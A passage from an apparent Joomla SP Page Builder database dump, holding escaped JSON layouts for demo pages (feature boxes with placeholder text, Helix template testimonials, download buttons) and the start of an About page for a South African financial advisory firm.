50%\",\"background_attachment\":\"inherit\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/demo/cta_bg.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client-white.png\",\"position\":\"sppb-text-center\",\"link\":\"#\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]}]','com_sppagebuilder','page',0,0,-2,0,1,0,'2015-01-22 07:12:35',391,'2015-01-26 19:05:52',391,0,'0000-00-00 00:00:00','[]','','','','*',0,''),(5,0,'Pricing Table','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"\",\"padding\":\"40px 0px 25px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#049bef\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"#ffffff\",\"title_fontsize\":36,\"heading_selector\":\"h2\",\"title\":\"Our Services\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[]}]},{\"type\":\"sp_row\",\"layout\":\"444\",\"settings\":{\"fullscreen\":0,\"margin\":\"100px 0 \",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":0,\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h2\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Well Documentattion\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-book\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Page Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-arrows\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-4\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"50\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Dedicated Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-users\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px\",\"padding\":\"60px 0px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 50%\",\"background_attachment\":\"inherit\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/demo/cta_bg.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/client-white.png\",\"position\":\"sppb-text-center\",\"link\":\"#\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]}]','com_sppagebuilder','page',0,0,-2,0,1,0,'2015-01-22 07:12:35',391,'2015-01-23 11:13:01',391,0,'0000-00-00 00:00:00','[]','','','','*',0,''),(6,0,'Portfolio','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"\",\"padding\":\"170px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 50%\",\"background_attachment\":\"inherit\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/featured-bg2.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":500,\"animation\":\"fadeInUp\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"FREE JOOMLA TEMPLATE\",\"heading_selector\":\"h1\",\"title_fontsize\":\"72\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"20\",\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore. sed do eiusmod tempor incididunt ut labore et dolore\",\"subtitle_fontsize\":\"18\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now!\",\"button_url\":\"http://www.joomshaper.com/helix\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"_blank\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"70px 0 5px\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":100,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":200,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":400,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Awesome Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-envelope\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"50px 0 100px\",\"margin\":\"0px 0px 100px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":300,\"animationdelay\":100,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Page Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-arrows\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":200,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Mega Menu\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-list\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Layout Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-check-square-o\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":400,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Google Font\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-google\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"Showcase\",\"heading_selector\":\"h2\",\"title_fontsize\":36,\"title_text_color\":\"#333333\",\"title_margin_top\":0,\"title_margin_bottom\":20,\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip\\n\\n\\n\\n\\n\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"\",\"margin\":\"100px 0px 0px\",\"fullscreen\":1},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"20\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"107\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px \",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#f5f5f5\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Jony Daku\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Michel Cattar\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Nanchel Culy\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/cta-bg.jpg\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"fixed\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":400,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Ready to our latest creation Helix III\",\"heading_selector\":\"h2\",\"title_fontsize\":\"36\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now!\",\"button_url\":\"http://www.joomshaper.com/helix\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"_blank\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]}]','com_sppagebuilder','page',0,0,-2,0,1,0,'2015-01-22 07:12:35',391,'2015-02-04 09:07:57',864,0,'0000-00-00 00:00:00','[]','','','','*',0,''),(7,234,'About us','[{\"layout\":\"4,8\",\"settings\":{\"fullscreen\":0,\"margin\":\"25px 0 0 0\",\"padding\":\"25px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"0 0\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-left\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"About Smith & Smith\"},\"id\":1496652256,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-8\",\"settings\":{\"class\":\"\",\"animationdelay\":0,\"animationduration\":300,\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1496652257,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652258,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p>Smith & Smith strives for the highest levels of professional service in all our dealings by giving clients informed advice that they can trust.</p><p>With knowledge and experience in all the financial disciplines – from healthcare to short-term insurance, investment planning and life assurance – we deal with corporates as well as individuals.</p><p>Smith & Smith has followed the guiding principle of personal service by helping individual investors, companies and families reach their financial goals.<br></p><p>Our business contracts with all the major South African insurers, healthcare providers and a number of high profile asset management companies, guarantees that you will get the best, from the best.</p><p>What distinguishes Smith & Smith is our high level of personalised service, together with our pledge to make the world of financial services easier for our clients.<br></p><p>Smith & Smith is a registered financial services provider with the Financial Services Board and supports the initiative on accreditation of financial advisors.</p>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{},\"id\":1496652259,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652260,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"quote-block\\\"><div><div class=\\\"left\\\"><img src=\\\"images/quote-marks-left.png\\\" alt=\\\"left-quotation\\\" data-mce-src=\\\"images/quote-marks-left.png\\\" width=\\\"36\\\" height=\\\"28\\\"></div></div>We pride ourselves on caring for our clients and having empathy for their circumstances.<div><div class=\\\"quote-right\\\"><img src=\\\"images/quote-marks-right.png\\\" alt=\\\"quotation-right\\\" data-mce-src=\\\"images/quote-marks-right.png\\\" width=\\\"36\\\" height=\\\"28\\\"></div></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"empty_space\",\"title\":\"Empty Space\",\"id\":1496652261,\"settings\":{\"admin_label\":\"\",\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"visibility\":1},{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1496652262,\"settings\":{\"admin_label\":\"Our goal is to…\",\"title\":\"Our goal is to…\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"0\",\"title_margin_bottom\":\"10\",\"text\":\"<ul><li>provide a personal service.</li><li>focus on the individual’s needs.</li><li>provide easy access to understandable
